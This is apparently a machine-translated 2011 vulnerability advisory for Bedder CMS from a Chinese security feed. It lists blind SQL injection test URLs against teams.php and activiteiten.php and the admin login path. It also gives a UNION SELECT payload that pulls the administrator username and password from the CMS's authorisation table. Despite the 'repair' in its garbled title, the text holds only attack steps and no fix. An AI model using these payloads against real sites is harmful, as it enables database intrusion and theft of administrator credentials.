Bedder CMS blind defect and repair-vulnerability warning-the black bar safety net

2011-05-24T00:00:00
ID MYHACK58:62201130588
Type myhack58
Reporter 佚名
Modified 2011-05-24T00:00:00

Description

Publishing author: Xecuti0n3r

Vulnerability type: SQL injection

Vulnerability description:

Vulnerability test:

Injection:

[+]True : http://www.myhack58.com/teams.php?id=1 and 1=1--

[+]False: http://www.myhack58.com/teams.php?id=1 and 1=2--

[+]eViL : http://www.myhack58.com/teams.php?id=[SQLi ]

Injection two,

[+]True : http://www.myhack58.com/activiteiten.php?id=91 and 1=1--

[+]False: http://www.myhack58.com/activiteiten.php?id=91 and 1=2--

[+]eViL : http://www.myhack58.com/activiteiten.php?id=[SQLi ]

Background login page:

[+]The Cms Login Page is at : http://www.myhack58.com/cms/index.php

Injection to obtain administrator password statement:

[+]evIL: teams. php? id=-1+union+select+1,2,concat(autorisatie_gebruikersnaam,0x3a,autorisatie_wachtwoord)+from+autorisatie